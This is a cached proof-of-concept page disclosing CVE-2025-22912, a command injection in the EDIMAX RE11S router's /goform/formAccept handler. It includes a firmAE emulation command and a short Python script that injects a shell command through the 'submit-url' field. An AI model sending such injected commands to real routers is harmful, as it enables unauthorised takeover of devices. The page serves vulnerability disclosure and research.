CVE-2025-22912 PoC — EDIMAX RE11S 安全漏洞

Source

https://github.com/passwa11/RE11S_1.11-formAccept-CommandInjection

Associated Vulnerability

Title:EDIMAX RE11S 安全漏洞 (CVE-2025-22912)
Description:EDIMAX RE11S是EDIMAX公司的一款路由器。 EDIMAX RE11S v1.11版本存在安全漏洞，该漏洞源于通过组件 /goform/formAccept 发现包含命令注入漏洞。

Description

CVE-2025-22912

Readme

# RE11S_1.11-formAccept-CommandInjection

During my internship at Qi An Xin Tiangong Lab, I discovered a  command injection vulnerability in the RE11S_1.11 router.

By analyzing the webs file in the bin directory, I found that the function formAccept contains a command injection vulnerability.

The command injection can be triggered by the submit-url key value, which leads to a system command injection.

![image-20241224100434040](https://gitee.com/xyqer/pic/raw/master/202501030933763.png)

## How can we simulate a router

Use the following command to simulate with firmAE.

```bash
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
```

The content of the **poc.py** file is as follows:

```python
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)
```

## Attack result

![image-20241224100515030](https://gitee.com/xyqer/pic/raw/master/202412301812486.png)

It can be seen that a /tmp/xyq file is added after the execution, which proves that the attack is successful.

File Snapshot


 [4.0K]  /data/pocs/c2218dde53474eafc9f6b789af4593e7540454d5
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!